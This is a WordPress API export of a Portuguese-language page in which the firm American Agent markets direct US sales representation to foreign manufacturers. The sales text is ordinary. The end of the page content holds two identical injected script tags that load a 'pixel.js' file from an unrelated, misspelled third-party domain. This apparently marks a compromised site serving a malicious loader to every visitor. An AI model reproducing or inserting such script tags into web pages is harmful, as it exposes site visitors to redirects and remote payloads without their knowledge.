{"id":3437,"date":"2014-08-30T10:05:23","date_gmt":"2014-08-30T14:05:23","guid":{"rendered":"https:\/\/americanagent.com\/direct-usa-sales-strategy-2\/"},"modified":"2014-11-14T08:25:55","modified_gmt":"2014-11-14T13:25:55","slug":"direct-usa-sales-strategy","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/","title":{"rendered":"Vendendo diretamente nos EUA"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-0fb1c46730d388eb65b4b6e86225adb7\">\n#top .av-special-heading.av-av_heading-0fb1c46730d388eb65b4b6e86225adb7{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-0fb1c46730d388eb65b4b6e86225adb7 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-0fb1c46730d388eb65b4b6e86225adb7 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-0fb1c46730d388eb65b4b6e86225adb7 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Vendendo diretamente nos EUA<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-0366cc7376be6c9e82a3e9cc8987b64f '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>A empresa <strong>American Agent<\/strong> \u00e9 capaz de realizar esfor\u00e7os de n\u00edveis de base de vendas muito poderosos e directos aqui nos EUA.<\/p>\n<p>Muitas empresas Americanas, hoje em dia, exigem rela\u00e7\u00f5es directas de compra com os seus fornecedores. Os &#8220;Representantes de Vendas\u201d \u00e0 base de comiss\u00f5es e os tradicionais &#8220;Representantes dos Fabricantes&#8221; simplesmente n\u00e3o s\u00e3o permitidos nesta realidade. Devido ao exposto, existem muitas empresas que nunca s\u00e3o revistas pelos Compradores Americanos e pelos Departamentos de Compras. Foram dadas instru\u00e7\u00f5es claras a muitos Compradores para trabalhar apenas com fabricantes e fornecedores que oferecem um relacionamento de compra directa.<\/p>\n<p>Compreendemos muito bem que o uso de Representantes \u00e0 base de comiss\u00f5es \u00e9 talvez a maneira com que tem trabalhado h\u00e1 d\u00e9cadas, infelizmente, aqui nos EUA esse tipo de abordagem n\u00e3o vai permitir que alcance os resultados de vendas que est\u00e1 \u00e0 espera de atingir. Toda as semanas somos contactados por uma empresa que j\u00e1 percebeu isso &#8211; s\u00f3 depois de ter investido muita energia, tempo e dinheiro da empresa.<\/p>\n<p>O nosso escrit\u00f3rio est\u00e1 preparado para reunir as suas empresas-alvo Americanas. Iremos abordar cada uma delas e localizar o Departamento de Compras e o Comprador certo para o seu sector.<\/p>\n<p>Ao explicar imediatamente ao Comprador que n\u00f3s os estamos a contactar para introduzir uma rela\u00e7\u00e3o directa com a sua empresa, incluindo pre\u00e7os directos, somos capazes de captar o interesse imediato e iniciar o processo de vendas por si.<\/p>\n<p>Trabalhar com o nosso escrit\u00f3rio permite manter-se focado nos territ\u00f3rios mais pr\u00f3ximos ao seu fuso hor\u00e1rio, vai investir o seu tempo somente quando descobrirmos um contato Americano qualificado que expresse um interesse s\u00f3lido. Pode considerar-nos como o seu pr\u00f3prio escrit\u00f3rio de vendas Americano.<\/p>\n<p>Visite tamb\u00e9m a outra \u00e1rea, &#8220;Servi\u00e7os de Apoio&#8221;. Operar directamente nos EUA, muitas vezes exige que tenha que lidar tamb\u00e9m com outras \u00e1reas de neg\u00f3cio. O escrit\u00f3rio da American Agent est\u00e1 bem preparado para encontrar as melhores solu\u00e7\u00f5es para qualquer situa\u00e7\u00e3o, fornecendo uma solu\u00e7\u00e3o Americana completa para a sua empresa.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3437","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent USA - Vendendo diretamente nos EUA<\/title>\n<meta name=\"description\" content=\"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent USA - Vendendo diretamente nos EUA\" \/>\n<meta property=\"og:description\" content=\"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-11-14T13:25:55+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/direct-usa-sales-strategy\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/direct-usa-sales-strategy\\\/\",\"name\":\"American Agent USA - Vendendo diretamente nos EUA\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\"},\"datePublished\":\"2014-08-30T14:05:23+00:00\",\"dateModified\":\"2014-11-14T13:25:55+00:00\",\"description\":\"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/direct-usa-sales-strategy\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/direct-usa-sales-strategy\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/direct-usa-sales-strategy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Vendendo diretamente nos EUA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent USA - Vendendo diretamente nos EUA","description":"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/","og_locale":"pt_BR","og_type":"article","og_title":"American Agent USA - Vendendo diretamente nos EUA","og_description":"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.","og_url":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-11-14T13:25:55+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/","url":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/","name":"American Agent USA - Vendendo diretamente nos EUA","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-br\/#website"},"datePublished":"2014-08-30T14:05:23+00:00","dateModified":"2014-11-14T13:25:55+00:00","description":"Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-br\/"},{"@type":"ListItem","position":2,"name":"Vendendo diretamente nos EUA"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-br\/#website","url":"https:\/\/americanagent.com\/pt-br\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/comments?post=3437"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3437\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/media?parent=3437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}